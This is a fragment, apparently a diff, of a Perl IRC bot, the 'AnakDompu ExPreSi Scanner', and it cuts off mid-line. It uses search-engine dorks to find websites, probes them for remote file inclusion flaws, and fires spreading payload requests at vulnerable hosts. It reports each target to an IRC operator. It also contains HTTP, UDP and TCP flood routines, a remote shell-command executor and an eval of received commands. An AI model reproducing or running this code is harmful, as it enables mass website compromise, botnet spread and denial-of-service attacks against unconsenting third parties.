$dork "); +my $uni=scalar(@puliti); +foreach my $sito (@puliti) +{ +$contatore++; +if ($contatore %100==0){ +} +if ($contatore==$uni-1){ + sendraw($IRC_cur_socket, "PRIVMSG $printl :13,6[1UOL]11,10[1SeLeSaI]13,6[1UnTuK]11,10[1DoRk]13,1 $dork"); +} +### Print CMD and TEST CMD### +my $test="http://".$sito.$bug.$id."?"; +my $print="http://".$sito.$bug.$cmd."?"; +### End of Print CMD and TEST CMD### +my $req=HTTP::Request->new(GET=>$test); +my $ua=LWP::UserAgent->new(); +$ua->timeout(5); +my $response=$ua->request($req); +if ($response->is_success) { +my $re=$response->content; +if($re =~ /AnakDompu/ && $re =~ /uid=/){ +my $hs=geths($print); $hosts{$hs}++; +if($hosts{$hs}=="1"){ +$x=os($test); +($type,$space)=split(/\,/,$x); + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1UOL]13,6[1OFF] 11,10[1Uname]10:7 $type 13,6[1TaRgEt]:9,1 $print"); + sendraw($IRC_cur_socket, "PRIVMSG Shinchi :Uname:6 $type Vuln:10 $print"); +my $test2="http://".$sito.$bug.$spread."?"; +my $reqz=HTTP::Request->new(GET=>$test2); +my $ua=LWP::UserAgent->new(); +my $response=$ua->request($reqz); +my $cinta="http://".$sito.$bug.$perawan."?"; +my $kasih=HTTP::Request->new(GET=>$cinta); +my $ua=LWP::UserAgent->new(); +my $response=$ua->request($kasih); +}} +elsif($re =~ /AnakDompu/) +{ +my $hs=geths($print); $hosts{$hs}++; +if($hosts{$hs}=="1"){ +$x=os($test); +($type,$space)=split(/\,/,$x); + sendraw($IRC_cur_socket, "PRIVMSG $printl :13,6[1UOL]11,10[1ON] 13,6[1TaRgEt]7,1 $print"); +my $test2="http://".$sito.$bug.$idku."?"; +my $reqz=HTTP::Request->new(GET=>$test2); +my $ua=LWP::UserAgent->new(); +my $response=$ua->request($reqz); +}} +}}} +exit; +}} + +###################################################################### +#################### ALTAVISTA +###################################################################### +if ($funcarg =~ /^scan\s+(.*?)\s+(.*)/){ +if (my $pid = fork) { +waitpid($pid, 0); +} else { +if (fork) { +exit; +} else { +my $bug=$1; +my $dork=$2; +my $contatore=0; +my %hosts; +# Starting The Search Engine + my @alist=&altavista($dork); + my @ablist=&altavistade($dork); + my @aclist=&altavistaus($dork); +push(my @tot, @alist,@ablist,@aclist); +my @puliti=&unici(@tot); + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1Altavista]13,6[1ToTaL]:8,6 ".scalar(@tot)." 11,10[1CleaneD]:8,6 ".scalar(@puliti)." 11,10[1Untuk]13,6[1Dork]4,1 $dork "); +my $uni=scalar(@puliti); +foreach my $sito (@puliti) +{ +$contatore++; +if ($contatore %100==0){ +} +if ($contatore==$uni-1){ + sendraw($IRC_cur_socket, "PRIVMSG $printl :13,6[1Altavista]11,10[1SeLeSaI]13,6[1UnTuK]11,10[1DoRk]13,1 $dork"); +} +### Print CMD and TEST CMD### +my $test="http://".$sito.$bug.$id."?"; +my $print="http://".$sito.$bug.$cmd."?"; +### End of Print CMD and TEST CMD### +my $req=HTTP::Request->new(GET=>$test); +my $ua=LWP::UserAgent->new(); +$ua->timeout(5); +my $response=$ua->request($req); +if ($response->is_success) { +my $re=$response->content; +if($re =~ /AnakDompu/ && $re =~ /uid=/){ +my $hs=geths($print); $hosts{$hs}++; +if($hosts{$hs}=="1"){ +$x=os($test); +($type,$space)=split(/\,/,$x); + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1Altavista]13,6[1OFF] 11,10[1Uname]10:7 $type 13,6[1TaRgEt]:9,1 $print"); + sendraw($IRC_cur_socket, "PRIVMSG Shinchi :Uname:6 $type Vuln:10 $print"); +my $test2="http://".$sito.$bug.$spread."?"; +my $reqz=HTTP::Request->new(GET=>$test2); +my $ua=LWP::UserAgent->new(); +my $response=$ua->request($reqz); +my $cinta="http://".$sito.$bug.$perawan."?"; +my $kasih=HTTP::Request->new(GET=>$cinta); +my $ua=LWP::UserAgent->new(); +my $response=$ua->request($kasih); +}} +elsif($re =~ /AnakDompu/) +{ +my $hs=geths($print); $hosts{$hs}++; +if($hosts{$hs}=="1"){ +$x=os($test); +($type,$space)=split(/\,/,$x); + sendraw($IRC_cur_socket, "PRIVMSG $printl :13,6[1Altavista]11,10[1ON] 13,6[1TaRgEt]7,1 $print"); +my $test2="http://".$sito.$bug.$idku."?"; +my $reqz=HTTP::Request->new(GET=>$test2); +my $ua=LWP::UserAgent->new(); +my $response=$ua->request($reqz); +}} +}}} +exit; +}} + +###################################################################### +#################### HOTBOT +###################################################################### +if ($funcarg =~ /^scan\s+(.*?)\s+(.*)/){ +if (my $pid = fork) { +waitpid($pid, 0); +} else { +if (fork) { +exit; +} else { +my $bug=$1; +my $dork=$2; +my $contatore=0; +my %hosts; +# Starting The Search Engine + my @hlist=&hotbot($dork); + my @hlistb=&hotbotb($dork); +push(my @tot, @hlist, @hlistb); +my @puliti=&unici(@tot); + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1HotBot]13,6[1ToTaL]:8,6 ".scalar(@tot)." 11,10[1CleaneD]:8,6 ".scalar(@puliti)." 11,10[1Untuk]13,6[1Dork]4,1 $dork "); +my $uni=scalar(@puliti); +foreach my $sito (@puliti) +{ +$contatore++; +if ($contatore %100==0){ +} +if ($contatore==$uni-1){ + sendraw($IRC_cur_socket, "PRIVMSG $printl :13,6[1HotBot]11,10[1SeLeSaI]13,6[1UnTuK]11,10[1DoRk]13,1 $dork"); +} +### Print CMD and TEST CMD### +my $test="http://".$sito.$bug.$id."?"; +my $print="http://".$sito.$bug.$cmd."?"; +### End of Print CMD and TEST CMD### +my $req=HTTP::Request->new(GET=>$test); +my $ua=LWP::UserAgent->new(); +$ua->timeout(5); +my $response=$ua->request($req); +if ($response->is_success) { +my $re=$response->content; +if($re =~ /AnakDompu/ && $re =~ /uid=/){ +my $hs=geths($print); $hosts{$hs}++; +if($hosts{$hs}=="1"){ +$x=os($test); +($type,$space)=split(/\,/,$x); + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1HotBot]13,6[1OFF] 11,10[1Uname]10:7 $type 13,6[1TaRgEt]:9,1 $print"); + sendraw($IRC_cur_socket, "PRIVMSG Shinchi :Uname:6 $type Vuln:10 $print"); +my $test2="http://".$sito.$bug.$spread."?"; +my $reqz=HTTP::Request->new(GET=>$test2); +my $ua=LWP::UserAgent->new(); +my $response=$ua->request($reqz); +my $cinta="http://".$sito.$bug.$perawan."?"; +my $kasih=HTTP::Request->new(GET=>$cinta); +my $ua=LWP::UserAgent->new(); +my $response=$ua->request($kasih); +}} +elsif($re =~ /AnakDompu/) +{ +my $hs=geths($print); $hosts{$hs}++; +if($hosts{$hs}=="1"){ +$x=os($test); +($type,$space)=split(/\,/,$x); + sendraw($IRC_cur_socket, "PRIVMSG $printl :13,6[1HotBot]11,10[1ON] 13,6[1TaRgEt]7,1 $print"); +my $test2="http://".$sito.$bug.$idku."?"; +my $reqz=HTTP::Request->new(GET=>$test2); +my $ua=LWP::UserAgent->new(); +my $response=$ua->request($reqz); +}} +}}} +exit; +}} + +###################################################################### +#################### MAMMA +###################################################################### +if ($funcarg =~ /^scan\s+(.*?)\s+(.*)/){ +if (my $pid = fork) { +waitpid($pid, 0); +} else { +if (fork) { +exit; +} else { +my $bug=$1; +my $dork=$2; +my $contatore=0; +my %hosts; +# Starting The Search Engine + my @malist=&mamma($dork); +push(my @tot, @malist); +my @puliti=&unici(@tot); + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1Mamma]13,6[1ToTaL]:8,6 ".scalar(@tot)." 11,10[1CleaneD]:8,6 ".scalar(@puliti)." 11,10[1Untuk]13,6[1Dork]4,1 $dork "); +my $uni=scalar(@puliti); +foreach my $sito (@puliti) +{ +$contatore++; +if ($contatore %100==0){ +} +if ($contatore==$uni-1){ + sendraw($IRC_cur_socket, "PRIVMSG $printl :13,6[1Mamma]11,10[1SeLeSaI]13,6[1UnTuK]11,10[1DoRk]13,1 $dork"); +} +### Print CMD and TEST CMD### +my $test="http://".$sito.$bug.$id."?"; +my $print="http://".$sito.$bug.$cmd."?"; +### End of Print CMD and TEST CMD### +my $req=HTTP::Request->new(GET=>$test); +my $ua=LWP::UserAgent->new(); +$ua->timeout(5); +my $response=$ua->request($req); +if ($response->is_success) { +my $re=$response->content; +if($re =~ /AnakDompu/ && $re =~ /uid=/){ +my $hs=geths($print); $hosts{$hs}++; +if($hosts{$hs}=="1"){ +$x=os($test); +($type,$space)=split(/\,/,$x); + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1Mamma]13,6[1OFF] 11,10[1Uname]10:7 $type 13,6[1TaRgEt]:9,1 $print"); + sendraw($IRC_cur_socket, "PRIVMSG Shinchi :Uname:6 $type Vuln:10 $print"); +my $test2="http://".$sito.$bug.$spread."?"; +my $reqz=HTTP::Request->new(GET=>$test2); +my $ua=LWP::UserAgent->new(); +my $response=$ua->request($reqz); +my $cinta="http://".$sito.$bug.$perawan."?"; +my $kasih=HTTP::Request->new(GET=>$cinta); +my $ua=LWP::UserAgent->new(); +my $response=$ua->request($kasih); +}} +elsif($re =~ /AnakDompu/) +{ +my $hs=geths($print); $hosts{$hs}++; +if($hosts{$hs}=="1"){ +$x=os($test); +($type,$space)=split(/\,/,$x); + sendraw($IRC_cur_socket, "PRIVMSG $printl :13,6[1Mamma]11,10[1ON] 13,6[1TaRgEt]7,1 $print"); +my $test2="http://".$sito.$bug.$idku."?"; +my $reqz=HTTP::Request->new(GET=>$test2); +my $ua=LWP::UserAgent->new(); +my $response=$ua->request($reqz); +}} +}}} +exit; +}} + +###################################################################### +#################### MOZBOT +###################################################################### +if ($funcarg =~ /^scan\s+(.*?)\s+(.*)/){ +if (my $pid = fork) { +waitpid($pid, 0); +} else { +if (fork) { +exit; +} else { +my $bug=$1; +my $dork=$2; +my $contatore=0; +my %hosts; +# Starting The Search Engine + my @mozlist=&mozbot($dork); + my @mozlista=&mozbota($dork); + my @mozlistb=&mozbotb($dork); +push(my @tot, @mozlist, @mozlista, @mozlistb); +my @puliti=&unici(@tot); + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1MozBot]13,6[1ToTaL]:8,6 ".scalar(@tot)." 11,10[1CleaneD]:8,6 ".scalar(@puliti)." 11,10[1Untuk]13,6[1Dork]4,1 $dork "); +my $uni=scalar(@puliti); +foreach my $sito (@puliti) +{ +$contatore++; +if ($contatore %100==0){ +} +if ($contatore==$uni-1){ + sendraw($IRC_cur_socket, "PRIVMSG $printl :13,6[1MozBot]11,10[1SeLeSaI]13,6[1UnTuK]11,10[1DoRk]13,1 $dork"); +} +### Print CMD and TEST CMD### +my $test="http://".$sito.$bug.$id."?"; +my $print="http://".$sito.$bug.$cmd."?"; +### End of Print CMD and TEST CMD### +my $req=HTTP::Request->new(GET=>$test); +my $ua=LWP::UserAgent->new(); +$ua->timeout(5); +my $response=$ua->request($req); +if ($response->is_success) { +my $re=$response->content; +if($re =~ /AnakDompu/ && $re =~ /uid=/){ +my $hs=geths($print); $hosts{$hs}++; +if($hosts{$hs}=="1"){ +$x=os($test); +($type,$space)=split(/\,/,$x); + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1MaZbot]13,6[1OFF] 11,10[1Uname]10:7 $type 13,6[1TaRgEt]:9,1 $print"); + sendraw($IRC_cur_socket, "PRIVMSG Shinchi :Uname:6 $type Vuln:10 $print"); +my $test2="http://".$sito.$bug.$spread."?"; +my $reqz=HTTP::Request->new(GET=>$test2); +my $ua=LWP::UserAgent->new(); +my $response=$ua->request($reqz); +my $cinta="http://".$sito.$bug.$perawan."?"; +my $kasih=HTTP::Request->new(GET=>$cinta); +my $ua=LWP::UserAgent->new(); +my $response=$ua->request($kasih); +}} +elsif($re =~ /AnakDompu/) +{ +my $hs=geths($print); $hosts{$hs}++; +if($hosts{$hs}=="1"){ +$x=os($test); +($type,$space)=split(/\,/,$x); + sendraw($IRC_cur_socket, "PRIVMSG $printl :13,6[1MaZBot]11,10[1ON] 13,6[1TaRgEt]7,1 $print"); +my $test2="http://".$sito.$bug.$idku."?"; +my $reqz=HTTP::Request->new(GET=>$test2); +my $ua=LWP::UserAgent->new(); +my $response=$ua->request($reqz); +}} +}}} +exit; +}} + +###################################################################### +#################### AOL +###################################################################### +if ($funcarg =~ /^scan\s+(.*?)\s+(.*)/){ +if (my $pid = fork) { +waitpid($pid, 0); +} else { +if (fork) { +exit; +} else { +my $bug=$1; +my $dork=$2; +my $contatore=0; +my %hosts; +# Starting The Search Engine + my @aollist=&aol($dork); + my @aollista=&aola($dork); + my @aollistb=&aolb($dork); + my @aollistc=&aolc($dork); +push(my @aolbyp,@aollist, @aollista, @aollistb, @aollistc ); +push(my @tot, @aolbyp); +my @puliti=&unici(@tot); + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1AOL]13,6[1ToTaL]:8,6 ".scalar(@tot)." 11,10[1CleaneD]:8,6 ".scalar(@puliti)." 11,10[1Untuk]13,6[1Dork]4,1 $dork "); +my $uni=scalar(@puliti); +foreach my $sito (@puliti) +{ +$contatore++; +if ($contatore %100==0){ +} +if ($contatore==$uni-1){ + sendraw($IRC_cur_socket, "PRIVMSG $printl :13,6[1AOL]11,10[1SeLeSaI]13,6[1UnTuK]11,10[1DoRk]13,1 $dork"); +} +### Print CMD and TEST CMD### +my $test="http://".$sito.$bug.$id."?"; +my $print="http://".$sito.$bug.$cmd."?"; +### End of Print CMD and TEST CMD### +my $req=HTTP::Request->new(GET=>$test); +my $ua=LWP::UserAgent->new(); +$ua->timeout(5); +my $response=$ua->request($req); +if ($response->is_success) { +my $re=$response->content; +if($re =~ /AnakDompu/ && $re =~ /uid=/){ +my $hs=geths($print); $hosts{$hs}++; +if($hosts{$hs}=="1"){ +$x=os($test); +($type,$space)=split(/\,/,$x); + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1AOL]13,6[1OFF] 11,10[1Uname]10:7 $type 13,6[1TaRgEt]:9,1 $print"); + sendraw($IRC_cur_socket, "PRIVMSG Shinchi :Uname:6 $type Vuln:10 $print"); +my $test2="http://".$sito.$bug.$spread."?"; +my $reqz=HTTP::Request->new(GET=>$test2); +my $ua=LWP::UserAgent->new(); +my $response=$ua->request($reqz); +my $cinta="http://".$sito.$bug.$perawan."?"; +my $kasih=HTTP::Request->new(GET=>$cinta); +my $ua=LWP::UserAgent->new(); +my $response=$ua->request($kasih); +}} +elsif($re =~ /AnakDompu/) +{ +my $hs=geths($print); $hosts{$hs}++; +if($hosts{$hs}=="1"){ +$x=os($test); +($type,$space)=split(/\,/,$x); + sendraw($IRC_cur_socket, "PRIVMSG $printl :13,6[1AOL]11,10[1ON] 13,6[1TaRgEt]7,1 $print"); +my $test2="http://".$sito.$bug.$idku."?"; +my $reqz=HTTP::Request->new(GET=>$test2); +my $ua=LWP::UserAgent->new(); +my $response=$ua->request($reqz); +}} +}}} +exit; +}} + +###################################################################### +#################### ASK +###################################################################### +if ($funcarg =~ /^scan\s+(.*?)\s+(.*)/){ +if (my $pid = fork) { +waitpid($pid, 0); +} else { +if (fork) { +exit; +} else { +my $bug=$1; +my $dork=$2; +my $contatore=0; +my %hosts; +# Starting The Search Engine + my @asklist=&ask($dork); + my @asklista=&aska($dork); + my @asklistb=&askb($dork); +push(my @tot, @asklist, @asklista, @asklistb); +my @puliti=&unici(@tot); + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1ASK]13,6[1ToTaL]:8,6 ".scalar(@tot)." 11,10[1CleaneD]:8,6 ".scalar(@puliti)." 11,10[1Untuk]13,6[1Dork]4,1 $dork "); +my $uni=scalar(@puliti); +foreach my $sito (@puliti) +{ +$contatore++; +if ($contatore %100==0){ +} +if ($contatore==$uni-1){ + sendraw($IRC_cur_socket, "PRIVMSG $printl :13,6[1ASK]11,10[1SeLeSaI]13,6[1UnTuK]11,10[1DoRk]13,1 $dork"); +} +### Print CMD and TEST CMD### +my $test="http://".$sito.$bug.$id."?"; +my $print="http://".$sito.$bug.$cmd."?"; +### End of Print CMD and TEST CMD### +my $req=HTTP::Request->new(GET=>$test); +my $ua=LWP::UserAgent->new(); +$ua->timeout(5); +my $response=$ua->request($req); +if ($response->is_success) { +my $re=$response->content; +if($re =~ /AnakDompu/ && $re =~ /uid=/){ +my $hs=geths($print); $hosts{$hs}++; +if($hosts{$hs}=="1"){ +$x=os($test); +($type,$space)=split(/\,/,$x); + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1ASK]13,6[1OFF] 11,10[1Uname]10:7 $type 13,6[1TaRgEt]:9,1 $print"); + sendraw($IRC_cur_socket, "PRIVMSG Shinchi :Uname:6 $type Vuln:10 $print"); +my $test2="http://".$sito.$bug.$spread."?"; +my $reqz=HTTP::Request->new(GET=>$test2); +my $ua=LWP::UserAgent->new(); +my $response=$ua->request($reqz); +my $cinta="http://".$sito.$bug.$perawan."?"; +my $kasih=HTTP::Request->new(GET=>$cinta); +my $ua=LWP::UserAgent->new(); +my $response=$ua->request($kasih); +}} +elsif($re =~ /AnakDompu/) +{ +my $hs=geths($print); $hosts{$hs}++; +if($hosts{$hs}=="1"){ +$x=os($test); +($type,$space)=split(/\,/,$x); + sendraw($IRC_cur_socket, "PRIVMSG $printl :13,6[1ASK]11,10[1ON] 13,6[1TaRgEt]7,1 $print"); +my $test2="http://".$sito.$bug.$idku."?"; +my $reqz=HTTP::Request->new(GET=>$test2); +my $ua=LWP::UserAgent->new(); +my $response=$ua->request($reqz); +}} +}}} +exit; +}} + +###################### +#End of EExPreSiSCANNER# +################################################## +# Ketika Rasa Tak Dapat Di Ungkap Dengan KataЩ # +# www.AnakDompu.by.ru # +# Created By Shinchi # +# #AnakDompu # +# irc.dal.net # +################################################## +###################### +if ($funcarg =~ /^httpflood\s+(.*)\s+(\d+)/) { +sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1Http DDoS] 13,6[1HaJaR] 10 ".$1." 11,10[1Pada Port 80 Untuk] 12 ".$2." Detik ."); +my $itime = time; +my ($cur_time); +$cur_time = time - $itime; +while ($2>$cur_time){ +$cur_time = time - $itime; +my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$1, PeerPort=>80); +print $socket "GET / HTTP/1.1\r\nAccept: */*\r\nHost: ".$1."\r\nConnection: Keep-Alive\r\n\r\n"; +close($socket); +} +sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1Http DDoS] 13,6[1HaJaR SeLeSaI] 7 ".$1."."); +} +###################### +# End of HTTPFlood # +################################################## +# Ketika Rasa Tak Dapat Di Ungkap Dengan KataЩ # +# www.AnakDompu.by.ru # +# Created By Shinchi # +# #AnakDompu # +# irc.dal.net # +################################################## +# UDPFlood # +###################### +if ($funcarg =~ /^udpflood\s+(.*)\s+(\d+)\s+(\d+)/) { +sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1Udp DDoS] 13,6[1HaJaR]12 ".$1." with 12 ".$2." Kb Packets for 12 ".$3." detik."); +my ($dtime, %pacotes) = udpflooder("$1", "$2", "$3"); +$dtime = 1 if $dtime == 0; +my %bytes; +$bytes{igmp} = $2 * $pacotes{igmp}; +$bytes{icmp} = $2 * $pacotes{icmp}; +$bytes{o} = $2 * $pacotes{o}; +$bytes{udp} = $2 * $pacotes{udp}; +$bytes{tcp} = $2 * $pacotes{tcp}; +sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1Udp DDoS] 13,6[1HaSiL]12 ".int(($bytes{icmp}+$bytes{igmp}+$bytes{udp} + $bytes{o})/1024)." Kb in12 ".$dtime." seconds to12 ".$1."."); +} +exit; +} +} +###################### +# End of Udpflood # +###################### + + +sub ircase { +my ($kem, $printl, $case) = @_; + if ($case =~ /^join (.*)/) { + j("$1"); + } + if ($case =~ /^part (.*)/) { + p("$1"); + } +if ($case =~ /^rejoin\s+(.*)/) { +my $chan = $1; +if ($chan =~ /^(\d+) (.*)/) { +for (my $ca = 1; $ca <= $1; $ca++ ) { +p("$2"); +j("$2"); +} +} +else { +p("$chan"); +j("$chan"); +} +} + +if ($case =~ /^op/) { +op("$printl", "$kem") if $case eq "op"; +my $oarg = substr($case, 3); +op("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/); +} + +if ($case =~ /^deop/) { +deop("$printl", "$kem") if $case eq "deop"; +my $oarg = substr($case, 5); +deop("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/); +} + +if ($case =~ /^msg\s+(\S+) (.*)/) { +msg("$1", "$2"); +} + +if ($case =~ /^flood\s+(\d+)\s+(\S+) (.*)/) { +for (my $cf = 1; $cf <= $1; $cf++) { +msg("$2", "$3"); +} +} + +if ($case =~ /^ctcp\s+(\S+) (.*)/) { +ctcp("$1", "$2"); +} + +if ($case =~ /^ctcpflood\s+(\d+)\s+(\S+) (.*)/) { +for (my $cf = 1; $cf <= $1; $cf++) { +ctcp("$2", "$3"); +} +} + +if ($case =~ /^nick (.*)/) { +nick("$1"); +} + +if ($case =~ /^connect\s+(\S+)\s+(\S+)/) { +conectar("$2", "$1", 6667); +} + +if ($case =~ /^raw (.*)/) { +sendraw("$1"); +} + +if ($case =~ /^eval (.*)/) { +eval "$1"; +} +} + + +sub shell { +my $printl=$_[0]; +my $comando=$_[1]; +if ($comando =~ /cd (.*)/) { +chdir("$1") || msg("$printl", "No such file or directory"); +return; +} + +elsif ($pid = fork) { +waitpid($pid, 0); +} +else { +if (fork) { +exit; + +} else { +my @resp=`$comando 2>&1 3>&1`; +my $c=0; +foreach my $linha (@resp) { + $c++; + chop $linha; + sendraw($IRC_cur_socket, "PRIVMSG $printl :$linha"); + if ($c == "$linas_max") { + $c=0; + sleep $sleep; + } +} +exit; +} +} +} + +sub tcpflooder { +my $itime = time; +my ($cur_time); +my ($ia,$pa,$proto,$j,$l,$t); +$ia=inet_aton($_[0]); +$pa=sockaddr_in($_[1],$ia); +$ftime=$_[2]; +$proto=getprotobyname('tcp'); +$j=0;$l=0; +$cur_time = time - $itime; +while ($l<1000){ +$cur_time = time - $itime; +last if $cur_time >= $ftime; +$t="SOCK$l"; +socket($t,PF_INET,SOCK_STREAM,$proto); +connect($t,$pa)||$j--; +$j++;$l++; +} +$l=0; +while ($l<1000){ +$cur_time = time - $itime; +last if $cur_time >= $ftime; +$t="SOCK$l"; +shutdown($t,2); +$l++; +} +} + +# %.%.%.%.%.%.%.%.%.%.%.%.%.%.%.% +# % AnakDompu ExPreSi Scanner Bot % +# %.%.%.%.%.%.%.%.%.%.%.%.%.%.%.% + +sub udpflooder { +my $iaddr = inet_aton($_[0]); +my $msg = 'A' x $_[1]; +my $ftime = $_[2]; +my $cp = 0; +my (%pacotes); +$pacotes{icmp} = $pacotes{igmp} = $pacotes{udp} = $pacotes{o} = $pacotes{tcp} = 0; +socket(SOCK1, PF_INET, SOCK_RAW, 2) or $cp++; +socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or $cp++; +socket(SOCK3, PF_INET, SOCK_RAW, 1) or $cp++; +socket(SOCK4, PF_INET, SOCK_RAW, 6) or $cp++; +return(undef) if $cp == 4; +my $itime = time; +my ($cur_time); +while ( 1 ) { +for (my $porta = 1; +$porta <= 65000; $porta++) { +$cur_time = time - $itime; +last if $cur_time >= $ftime; +send(SOCK1, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{igmp}++; +send(SOCK2, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{udp}++; +send(SOCK3, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{icmp}++; +send(SOCK4, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{tcp}++; + + +for (my $pc = 3; +$pc <= 255;$pc++) { +next if $pc == 6; +$cur_time = time - $itime; +last if $cur_time >= $ftime; +socket(SOCK5, PF_INET, SOCK_RAW, $pc) or next; +send(SOCK5, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{o}++; +} +} +last if $cur_time >= $ftime; +} +return($cur_time, %pacotes); +} + +sub ctcp { +return unless $#_ == 1; +sendraw("PRIVMSG $_[0] :\001$_[1]\001"); +} + +sub msg { +return unless $#_ == 1; +sendraw("PRIVMSG $_[0] :$_[1]"); +} + +sub notice { +return unless $#_ == 1; +sendraw("NOTICE $_[0] :$_[1]"); +} + +sub op { +return unless $#_ == 1; +sendraw("MODE $_[0] +o $_[1]"); +} + +sub deop { +return unless $#_ == 1; +sendraw("MODE $_[0] -o $_[1]"); +} + +sub j { +&join(@_); +} + +sub join { +return unless $#_ == 0; +sendraw("JOIN $_[0]"); + +} +sub p { part(@_); +} + +sub part { +sendraw("PART $_[0]"); +} + +sub nick { +return unless $#_ == 0; +sendraw("NICK $_[0]"); +} + +sub quit { +sendraw("QUIT :$_[0]"); +} + +##### +# SUBS GOOGLE +##### +sub googlet { +my @dominios = ("ae","com.ar","at","com.au","be","com.br","ca","ch","cl","de","dk"); +my @country = ("AE","AR","AT","AU","BE","BR","CA","CH","CL","DE","DK"); +my @lang = ("en","es","de","nl","pt-BR","it","de","fo","sv","fr","el"); +my @lst; +my $key=key($_[0]); +my $c=0; +foreach my $i (@dominios){ +my @lista = google($i,$key,$lang[$c],$country[$c]); +push(@lst,@lista); +$c++; +} +return @lst; +} + +sub google(){ +my @lst; +my $i=$_[0]; +my $key=$_[1]; +my $lang= $_[2]; +my $country =$_[3]; +for($b=0;$b<=5000;$b+=100){ +my $Go=("www.google.".$i."/search?hl=".$lang."&q=".key($key)."&num=100&start=".$b."&meta=cr%3Dcountry".$country); +my $Res=query($Go); +while($Res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g){ +if ($1 !~ /google/){ +my $k=$1; +my @grep=links($k); +push(@lst,@grep); +}}} +return @lst; +} + +##### +# SUBS AllTheWeb +##### + +sub allthewebt { +my @lang = ("en","es","de","nl","pt-BR","it","de","fo"); +my @lst; +my $key=key($_[0]); +my $c=0; +foreach my $lang (@lang){ +my @lista = alltheweb($key,$lang[$c]); +push(@lst,@lista); +$c++; +} +return @lst; +} + + +sub alltheweb(){ +my @lista; +my $key = $_[0]; +my $lang= $_[1]; +for($b=0;$b<=500;$b+=100){ +my $alltheweb=("http://www.alltheweb.com/search?cat=web&_sb_lang=".$lang."&hits=100&q=".key($key)."&o=".$b); +my $Res=query($alltheweb); +while($Res =~ m/<span class=\"?resURL\"?>http:\/\/(.+?)\<\/span>/g){ +my $k=$1; +$k=~s/ //g; +my @grep=links($k); +push(@lst,@grep); +}} +return @lst; +} + +sub standard() +{ +my @lst; +my $key=$_[0]; +my $i=0; +my $pg=0; +for($i=0; $i<=1000; $i+=100) +{ +my $all=("http://www.alltheweb.com/search?cat=web&_sb_lang=any&hits=100&q=".key($key)."&o=".$i); +my $Res=query($all); +while($Res =~ m/<span class=\"?resURL\"?>http:\/\/(.+?)\<\/span>/g){ +my $k=$1; +$k=~s/ //g; +my @grep=links($k); +push(@lst,@grep); +}} +return @lst; +} + +##### +# SUBS Lycos +##### +sub lycos(){ +my @lst; +my $key = $_[0]; +for($b=0;$b<=1000;$b+=100){ +my $ly=("http://search.lycos.com/?query=".key($key)."&page=$av".$b); +my $Res=query($ly); +while($Res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g){ +if ($1 !~ /msn|live|google|yahoo/){ +my $k=$1; +my @grep=links($k); +push(@lst,@grep); +}}} +return @lst; +} + +##### +# SUBS Yahoo +##### +sub yahoo(){ +my @lst; +my $key = $_[0]; +for($b=1;$b<=1000;$b+=100){ +my $Ya=("http://br.search.yahoo.com/search?ei=UTF-8&fr=cb-globo&fr2=sfp&p=".key($key)."&n=100&fr=sfp&b=".$b); +my $Res=query($Ya); +while($Res =~ m/\<span class=yschurl>(.+?)\<\/span>/g){ +my $k=$1; +$k=~s/<b>//g; +$k=~s/<\/b>//g; +$k=~s/<wbr>//g; +my @grep=links($k); +push(@lst,@grep); +}} +return @lst; +} + +sub yahooa(){ +my @lst; +my $key = $_[0]; +for($b=210;$b<=1000;$b+=210){ +my $Ya=("http://be.search.yahoo.com/search?ei=UTF-8&fr=cb-globo&fr2=sfp&p=".key($key)."&n=100&fr=sfp&b=".$b); +my $Res=query($Ya); +while($Res =~ m/\<span class=yschurl>(.+?)\<\/span>/g){ +my $k=$1; +$k=~s/<b>//g; +$k=~s/<\/b>//g; +$k=~s/<wbr>//g; +my @grep=links($k); +push(@lst,@grep); +}} +return @lst; +} + +sub yahoob(){ +my @lst; +my $key = $_[0]; +for($b=410;$b<=1000;$b+=210){ +my $Ya=("http://us.search.yahoo.com/search?ei=UTF-8&fr=cb-globo&fr2=sfp&p=".key($key)."&n=100&fr=sfp&b=".$b); +my $Res=query($Ya); +while($Res =~ m/\<span class=yschurl>(.+?)\<\/span>/g){ +my $k=$1; +$k=~s/<b>//g; +$k=~s/<\/b>//g; +$k=~s/<wbr>//g; +my @grep=links($k); +push(@lst,@grep); +}} +return @lst; +} + +sub yahooc(){ +my @lst; +my $key = $_[0]; +for($b=610;$b<=1000;$b+=210){ +my $Ya=("http://it.search.yahoo.com/search?ei=UTF-8&fr=cb-globo&fr2=sfp&p=".key($key)."&n=100&fr=sfp&b=".$b); +my $Res=query($Ya); +while($Res =~ m/\<span class=yschurl>(.+?)\<\/span>/g){ +my $k=$1; +$k=~s/<b>//g; +$k=~s/<\/b>//g; +$k=~s/<wbr>//g; +my @grep=links($k); +push(@lst,@grep); +}} +return @lst; +} + +sub yahood(){ +my @lst; +my $key = $_[0]; +for($b=810;$b<=1000;$b+=210){ +my $Ya=("http://de.search.yahoo.com/search?ei=UTF-8&fr=cb-globo&fr2=sfp&p=".key($key)."&n=100&fr=sfp&b=".$b); +my $Res=query($Ya); +while($Res =~ m/\<span 